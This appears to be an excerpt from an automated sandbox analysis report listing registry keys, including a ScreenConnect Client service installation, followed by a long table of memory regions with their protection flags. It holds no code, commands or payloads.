HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\Features
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Windows\Installer\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\Patches
|
AllPatches
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
ProductName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
PackageCode
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
Assignment
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
AdvertiseFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
ProductIcon
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
InstanceType
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
AuthorizedLUAApp
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
DeploymentFlags
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
D92D2B5F2F6B5294C50B8E8EAE9834D1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\SourceList
|
PackageName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\SourceList\Net
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\SourceList\Media
|
1
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1
|
Clients
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Products\D92D2B5F2F6B5294C50B8E8EAE9834D1\SourceList
|
LastUsedSource
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings
|
StringCacheGeneration
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
|
AutoBackupLogFiles
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
|
EventMessageFile
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e6cb77284cf765aa)
|
ImagePath
|
There are 89 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1135000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EA0000
|
trusted library allocation
|
page read and write
|
||
|
3E40000
|
trusted library allocation
|
page read and write
|
||
|
3DA0000
|
trusted library allocation
|
page read and write
|
||
|
1500000
|
trusted library allocation
|
page read and write
|
||
|
17AE000
|
stack
|
page read and write
|
||
|
1B9F0000
|
unkown
|
page readonly
|
||
|
104E000
|
stack
|
page read and write
|
||
|
7FF886D1D000
|
trusted library allocation
|
page read and write
|
||
|
6C95000
|
trusted library allocation
|
page read and write
|
||
|
3E30000
|
trusted library allocation
|
page read and write
|
||
|
34FD000
|
heap
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
50AD000
|
stack
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
124F1000
|
trusted library allocation
|
page read and write
|
||
|
8D44000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E3F000
|
trusted library allocation
|
page read and write
|
||
|
15BA000
|
heap
|
page read and write
|
||
|
617D000
|
stack
|
page read and write
|
||
|
5A1E000
|
trusted library allocation
|
page read and write
|
||
|
A391000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E95000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA1000
|
trusted library allocation
|
page read and write
|
||
|
1BA77000
|
stack
|
page read and write
|
||
|
1E4E000
|
trusted library allocation
|
page read and write
|
||
|
D60000
|
trusted library section
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
D65000
|
heap
|
page read and write
|
||
|
7FF886F00000
|
trusted library allocation
|
page read and write
|
||
|
4E43000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
4000000
|
trusted library allocation
|
page read and write
|
||
|
900E000
|
trusted library allocation
|
page read and write
|
||
|
5130000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
heap
|
page read and write
|
||
|
18E56013000
|
heap
|
page read and write
|
||
|
313F000
|
stack
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CB8000
|
trusted library allocation
|
page read and write
|
||
|
340E000
|
stack
|
page read and write
|
||
|
43AF000
|
stack
|
page read and write
|
||
|
7FF886C3A000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C37D000
|
stack
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
7FF4B6230000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A80000
|
trusted library allocation
|
page execute and read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
7FF886DA1000
|
trusted library allocation
|
page read and write
|
||
|
1550000
|
heap
|
page execute and read and write
|
||
|
7FF886D05000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C33000
|
trusted library allocation
|
page execute and read and write
|
||
|
518E000
|
stack
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
2992000
|
unkown
|
page readonly
|
||
|
33CF000
|
stack
|
page read and write
|
||
|
E07000
|
heap
|
page read and write
|
||
|
4F03000
|
heap
|
page read and write
|
||
|
7FF886B23000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D44000
|
trusted library allocation
|
page read and write
|
||
|
5A60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B3E000
|
trusted library allocation
|
page execute and read and write
|
||
|
5C6C000
|
trusted library section
|
page read and write
|
||
|
42AE000
|
stack
|
page read and write
|
||
|
585D000
|
stack
|
page read and write
|
||
|
7FF886E92000
|
trusted library allocation
|
page read and write
|
||
|
9C0000
|
unkown
|
page readonly
|
||
|
8D5000
|
heap
|
page read and write
|
||
|
5284000
|
trusted library allocation
|
page read and write
|
||
|
46C0000
|
trusted library allocation
|
page read and write
|
||
|
24DACFE000
|
unkown
|
page readonly
|
||
|
860000
|
trusted library allocation
|
page read and write
|
||
|
3006000
|
trusted library allocation
|
page read and write
|
||
|
57AF000
|
stack
|
page read and write
|
||
|
29F0000
|
unkown
|
page readonly
|
||
|
1E48000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
DA6000
|
heap
|
page read and write
|
||
|
86F000
|
unkown
|
page readonly
|
||
|
1C410000
|
heap
|
page read and write
|
||
|
249C000
|
trusted library allocation
|
page read and write
|
||
|
1590000
|
heap
|
page read and write
|
||
|
7FF886DB3000
|
trusted library allocation
|
page read and write
|
||
|
6301000
|
trusted library allocation
|
page read and write
|
||
|
6C8D000
|
trusted library allocation
|
page read and write
|
||
|
3E25000
|
trusted library allocation
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
13A0000
|
trusted library allocation
|
page read and write
|
||
|
114E000
|
stack
|
page read and write
|
||
|
1520000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F00000
|
trusted library allocation
|
page read and write
|
||
|
124FE000
|
trusted library allocation
|
page read and write
|
||
|
24E0000
|
heap
|
page execute and read and write
|
||
|
95D000
|
stack
|
page read and write
|
||
|
7FF886CB0000
|
trusted library allocation
|
page read and write
|
||
|
9C1000
|
unkown
|
page execute read
|
||
|
7FF886ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
1B1B4000
|
heap
|
page read and write
|
||
|
46B0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
34B7000
|
heap
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
55EE000
|
stack
|
page read and write
|
||
|
13CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886DA9000
|
trusted library allocation
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
371000
|
stack
|
page read and write
|
||
|
15AC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
FB3000
|
heap
|
page read and write
|
||
|
2B21000
|
trusted library allocation
|
page read and write
|
||
|
29F2000
|
unkown
|
page readonly
|
||
|
34C5000
|
heap
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E96000
|
trusted library allocation
|
page read and write
|
||
|
EBC000
|
stack
|
page read and write
|
||
|
4640000
|
trusted library allocation
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
|
EC0000
|
heap
|
page read and write
|
||
|
13B4000
|
trusted library allocation
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
4660000
|
trusted library allocation
|
page read and write
|
||
|
2897000
|
trusted library allocation
|
page read and write
|
||
|
1B869000
|
heap
|
page read and write
|
||
|
6E07000
|
trusted library allocation
|
page read and write
|
||
|
3FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
12E7000
|
heap
|
page read and write
|
||
|
DBC000
|
heap
|
page read and write
|
||
|
124FC000
|
trusted library allocation
|
page read and write
|
||
|
4E30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page read and write
|
||
|
54AE000
|
stack
|
page read and write
|
||
|
59FB000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
51D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
18E565A0000
|
trusted library allocation
|
page read and write
|
||
|
51E0000
|
trusted library allocation
|
page read and write
|
||
|
1BE83000
|
heap
|
page execute and read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
748000
|
unkown
|
page readonly
|
||
|
7FF886BCC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B88F000
|
heap
|
page read and write
|
||
|
7FF886DB1000
|
trusted library allocation
|
page read and write
|
||
|
17EE000
|
stack
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
D60000
|
heap
|
page read and write
|
||
|
D70000
|
trusted library allocation
|
page read and write
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
24DA7FE000
|
stack
|
page read and write
|
||
|
5AA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7645000
|
trusted library allocation
|
page read and write
|
||
|
1120000
|
trusted library allocation
|
page read and write
|
||
|
7E6E000
|
stack
|
page read and write
|
||
|
7FF886B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
44EE000
|
stack
|
page read and write
|
||
|
7FF886D83000
|
trusted library allocation
|
page read and write
|
||
|
4141000
|
trusted library allocation
|
page read and write
|
||
|
5670000
|
trusted library allocation
|
page read and write
|
||
|
40C0000
|
unkown
|
page readonly
|
||
|
56F0000
|
trusted library allocation
|
page read and write
|
||
|
1B1C8000
|
heap
|
page read and write
|
||
|
6CA9000
|
trusted library allocation
|
page read and write
|
||
|
5AB4000
|
trusted library section
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB5000
|
trusted library allocation
|
page read and write
|
||
|
50F0000
|
heap
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page execute and read and write
|
||
|
7F5D8000
|
trusted library allocation
|
page execute and read and write
|
||
|
9F0000
|
heap
|
page read and write
|
||
|
7FF886B2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3DF6000
|
trusted library allocation
|
page read and write
|
||
|
1B740000
|
trusted library allocation
|
page read and write
|
||
|
3DB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D4B000
|
trusted library allocation
|
page read and write
|
||
|
1502000
|
trusted library allocation
|
page read and write
|
||
|
12B2E000
|
trusted library allocation
|
page read and write
|
||
|
6901000
|
trusted library allocation
|
page read and write
|
||
|
56EA000
|
stack
|
page read and write
|
||
|
24DABFC000
|
stack
|
page read and write
|
||
|
4E4D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CC0000
|
trusted library allocation
|
page read and write
|
||
|
51CE000
|
stack
|
page read and write
|
||
|
25B0000
|
trusted library allocation
|
page read and write
|
||
|
56A0000
|
heap
|
page execute and read and write
|
||
|
18E56002000
|
heap
|
page read and write
|
||
|
9D4000
|
unkown
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
351B000
|
heap
|
page read and write
|
||
|
4E8B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1890000
|
heap
|
page read and write
|
||
|
344F000
|
stack
|
page read and write
|
||
|
46AE000
|
stack
|
page read and write
|
||
|
25DE000
|
trusted library allocation
|
page read and write
|
||
|
1B0AD000
|
stack
|
page read and write
|
||
|
F99000
|
stack
|
page read and write
|
||
|
6E0D000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E90000
|
trusted library allocation
|
page read and write
|
||
|
1130000
|
trusted library allocation
|
page read and write
|
||
|
2F58000
|
stack
|
page read and write
|
||
|
7FF886B14000
|
trusted library allocation
|
page read and write
|
||
|
4792000
|
trusted library allocation
|
page read and write
|
||
|
242E000
|
stack
|
page read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
527C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E37000
|
trusted library allocation
|
page read and write
|
||
|
6C9C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E35000
|
trusted library allocation
|
page read and write
|
||
|
12BE000
|
stack
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
EEB000
|
heap
|
page read and write
|
||
|
13EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
5A35000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D59000
|
trusted library allocation
|
page read and write
|
||
|
24DADFE000
|
stack
|
page read and write
|
||
|
1B720000
|
heap
|
page execute and read and write
|
||
|
2A10000
|
heap
|
page execute and read and write
|
||
|
1177000
|
heap
|
page read and write
|
||
|
59F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DEF000
|
trusted library allocation
|
page read and write
|
||
|
1696000
|
heap
|
page read and write
|
||
|
603E000
|
stack
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
1122000
|
trusted library allocation
|
page read and write
|
||
|
452E000
|
stack
|
page read and write
|
||
|
567A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB7000
|
trusted library allocation
|
page read and write
|
||
|
1B2C3000
|
trusted library section
|
page read and write
|
||
|
7FF886B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
24DA27B000
|
stack
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
D0E000
|
stack
|
page read and write
|
||
|
4E44000
|
trusted library allocation
|
page read and write
|
||
|
10F0000
|
trusted library allocation
|
page read and write
|
||
|
3DF2000
|
trusted library allocation
|
page read and write
|
||
|
5ABA000
|
stack
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C4B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
5A50000
|
trusted library allocation
|
page read and write
|
||
|
1C44000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D22000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
1A50000
|
heap
|
page execute and read and write
|
||
|
517E000
|
stack
|
page read and write
|
||
|
1260E000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
D6C000
|
heap
|
page read and write
|
||
|
1540000
|
trusted library allocation
|
page read and write
|
||
|
2960000
|
trusted library section
|
page read and write
|
||
|
4060000
|
unkown
|
page readonly
|
||
|
50EE000
|
stack
|
page read and write
|
||
|
18E55E30000
|
heap
|
page read and write
|
||
|
6E09000
|
trusted library allocation
|
page read and write
|
||
|
18E56043000
|
heap
|
page read and write
|
||
|
7FF886DA3000
|
trusted library allocation
|
page read and write
|
||
|
18E56000000
|
heap
|
page read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
D70000
|
heap
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886CF3000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
1850000
|
heap
|
page read and write
|
||
|
52F0000
|
heap
|
page execute and read and write
|
||
|
481D000
|
stack
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A61000
|
trusted library allocation
|
page read and write
|
||
|
9CD000
|
unkown
|
page readonly
|
||
|
7FF886ED0000
|
trusted library allocation
|
page read and write
|
||
|
8D4A000
|
trusted library allocation
|
page read and write
|
||
|
2CD9000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
2900000
|
trusted library allocation
|
page read and write
|
||
|
348A000
|
heap
|
page read and write
|
||
|
7FF886B14000
|
trusted library allocation
|
page read and write
|
||
|
3E70000
|
heap
|
page execute and read and write
|
||
|
1A3E000
|
stack
|
page read and write
|
||
|
5A21000
|
trusted library allocation
|
page read and write
|
||
|
1D423000
|
heap
|
page read and write
|
||
|
5460000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EAA000
|
trusted library allocation
|
page read and write
|
||
|
534D000
|
stack
|
page read and write
|
||
|
16AE000
|
heap
|
page read and write
|
||
|
7FF886BC6000
|
trusted library allocation
|
page read and write
|
||
|
51DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
16A7000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
527E000
|
stack
|
page read and write
|
||
|
5280000
|
trusted library allocation
|
page read and write
|
||
|
51F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28FF000
|
trusted library allocation
|
page read and write
|
||
|
193E000
|
stack
|
page read and write
|
||
|
F88000
|
heap
|
page read and write
|
||
|
2940000
|
heap
|
page read and write
|
||
|
4E70000
|
heap
|
page read and write
|
||
|
15F1000
|
heap
|
page read and write
|
||
|
1530000
|
trusted library allocation
|
page execute and read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
5860000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E33000
|
trusted library allocation
|
page read and write
|
||
|
2A67000
|
trusted library allocation
|
page read and write
|
||
|
840000
|
trusted library allocation
|
page read and write
|
||
|
12B30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CC3000
|
trusted library allocation
|
page read and write
|
||
|
3141000
|
trusted library allocation
|
page read and write
|
||
|
4F1D000
|
heap
|
page read and write
|
||
|
5212000
|
trusted library allocation
|
page read and write
|
||
|
13BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
18E5602B000
|
heap
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
720000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
4EF0000
|
heap
|
page read and write
|
||
|
D88000
|
heap
|
page read and write
|
||
|
351D000
|
heap
|
page read and write
|
||
|
7FF886F30000
|
trusted library allocation
|
page read and write
|
||
|
4F01000
|
heap
|
page read and write
|
||
|
24DA8FE000
|
unkown
|
page readonly
|
||
|
79FE000
|
stack
|
page read and write
|
||
|
52E0000
|
trusted library allocation
|
page read and write
|
||
|
DC4000
|
heap
|
page read and write
|
||
|
7FF886CCF000
|
trusted library allocation
|
page read and write
|
||
|
5087000
|
heap
|
page read and write
|
||
|
5110000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C53000
|
trusted library allocation
|
page execute and read and write
|
||
|
4790000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CFF000
|
trusted library allocation
|
page read and write
|
||
|
2430000
|
heap
|
page execute and read and write
|
||
|
15F4000
|
heap
|
page read and write
|
||
|
7FF886E07000
|
trusted library allocation
|
page read and write
|
||
|
1E4C000
|
trusted library allocation
|
page read and write
|
||
|
4F2C000
|
heap
|
page read and write
|
||
|
1104000
|
trusted library allocation
|
page read and write
|
||
|
4E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D6E000
|
trusted library allocation
|
page read and write
|
||
|
80B0000
|
heap
|
page read and write
|
||
|
1B8AF000
|
heap
|
page read and write
|
||
|
E03000
|
heap
|
page read and write
|
||
|
776000
|
heap
|
page read and write
|
||
|
1132000
|
trusted library allocation
|
page read and write
|
||
|
530B000
|
stack
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
1B7B2000
|
unkown
|
page readonly
|
||
|
161C000
|
heap
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
|
5D40000
|
heap
|
page read and write
|
||
|
52D0000
|
trusted library allocation
|
page read and write
|
||
|
B80000
|
heap
|
page read and write
|
||
|
77E000
|
heap
|
page read and write
|
||
|
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E3E000
|
trusted library allocation
|
page read and write
|
||
|
1B8B2000
|
heap
|
page read and write
|
||
|
5EF0000
|
trusted library allocation
|
page read and write
|
||
|
18E56602000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F10000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
47DD000
|
stack
|
page read and write
|
||
|
7FF886CCC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE1000
|
trusted library allocation
|
page read and write
|
||
|
5680000
|
trusted library section
|
page read and write
|
||
|
7FF886E94000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
1C400000
|
heap
|
page read and write
|
||
|
7FF886B6C000
|
trusted library allocation
|
page execute and read and write
|
||
|
9D6000
|
unkown
|
page readonly
|
||
|
1B840000
|
heap
|
page read and write
|
||
|
52E4000
|
trusted library allocation
|
page read and write
|
||
|
3525000
|
heap
|
page read and write
|
||
|
7BEE000
|
stack
|
page read and write
|
||
|
529E000
|
trusted library allocation
|
page read and write
|
||
|
24DAEFE000
|
unkown
|
page readonly
|
||
|
3385000
|
heap
|
page read and write
|
||
|
5AB0000
|
trusted library section
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EF3000
|
heap
|
page read and write
|
||
|
7BA000
|
heap
|
page read and write
|
||
|
3DE0000
|
trusted library allocation
|
page read and write
|
||
|
5280000
|
trusted library allocation
|
page read and write
|
||
|
14FE000
|
stack
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
1AA7D000
|
stack
|
page read and write
|
||
|
18E55F10000
|
heap
|
page read and write
|
||
|
7FF886CC7000
|
trusted library allocation
|
page read and write
|
||
|
6C93000
|
trusted library allocation
|
page read and write
|
||
|
12500000
|
trusted library allocation
|
page read and write
|
||
|
24F1000
|
trusted library allocation
|
page read and write
|
||
|
80AC000
|
stack
|
page read and write
|
||
|
3FAA000
|
trusted library allocation
|
page read and write
|
||
|
2B7E000
|
trusted library allocation
|
page read and write
|
||
|
5301000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D05000
|
trusted library allocation
|
page read and write
|
||
|
12E0000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
DC2000
|
heap
|
page read and write
|
||
|
85D000
|
stack
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
7FF886CC5000
|
trusted library allocation
|
page read and write
|
||
|
24D0000
|
heap
|
page read and write
|
||
|
57B0000
|
trusted library section
|
page read and write
|
||
|
13B3000
|
trusted library allocation
|
page execute and read and write
|
||
|
12541000
|
trusted library allocation
|
page read and write
|
||
|
1667000
|
heap
|
page read and write
|
||
|
7640000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
110D000
|
trusted library allocation
|
page execute and read and write
|
||
|
DC6000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
1E44000
|
trusted library allocation
|
page read and write
|
||
|
331000
|
unkown
|
page execute read
|
||
|
1278000
|
stack
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
52A1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DED000
|
trusted library allocation
|
page read and write
|
||
|
2460000
|
trusted library allocation
|
page read and write
|
||
|
5700000
|
trusted library allocation
|
page read and write
|
||
|
3FD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
|
5A40000
|
trusted library allocation
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
12B2C000
|
trusted library allocation
|
page read and write
|
||
|
EE0000
|
heap
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
4ECA000
|
stack
|
page read and write
|
||
|
7FF886D37000
|
trusted library allocation
|
page read and write
|
||
|
287C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D85000
|
trusted library allocation
|
page read and write
|
||
|
5A78000
|
trusted library allocation
|
page read and write
|
||
|
1BE80000
|
heap
|
page execute and read and write
|
||
|
9CD000
|
unkown
|
page readonly
|
||
|
55AC000
|
stack
|
page read and write
|
||
|
7FF886CD0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
33D000
|
unkown
|
page readonly
|
||
|
1A2000
|
unkown
|
page readonly
|
||
|
13D0000
|
heap
|
page read and write
|
||
|
7FF886E3A000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
1103000
|
trusted library allocation
|
page execute and read and write
|
||
|
507B000
|
heap
|
page read and write
|
||
|
7FF886BC0000
|
trusted library allocation
|
page read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
7FF886EF0000
|
trusted library allocation
|
page read and write
|
||
|
544C000
|
stack
|
page read and write
|
||
|
3506000
|
heap
|
page read and write
|
||
|
1A0000
|
unkown
|
page readonly
|
||
|
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
|
1BC6D000
|
stack
|
page read and write
|
||
|
6C7D000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
184E000
|
stack
|
page read and write
|
||
|
7FF886D48000
|
trusted library allocation
|
page read and write
|
||
|
3E11000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5230000
|
heap
|
page execute and read and write
|
||
|
24DA9FE000
|
stack
|
page read and write
|
||
|
111D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24C5000
|
heap
|
page read and write
|
||
|
7FF886FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5280000
|
trusted library allocation
|
page read and write
|
||
|
5710000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B4EE000
|
stack
|
page read and write
|
||
|
7D2F000
|
stack
|
page read and write
|
||
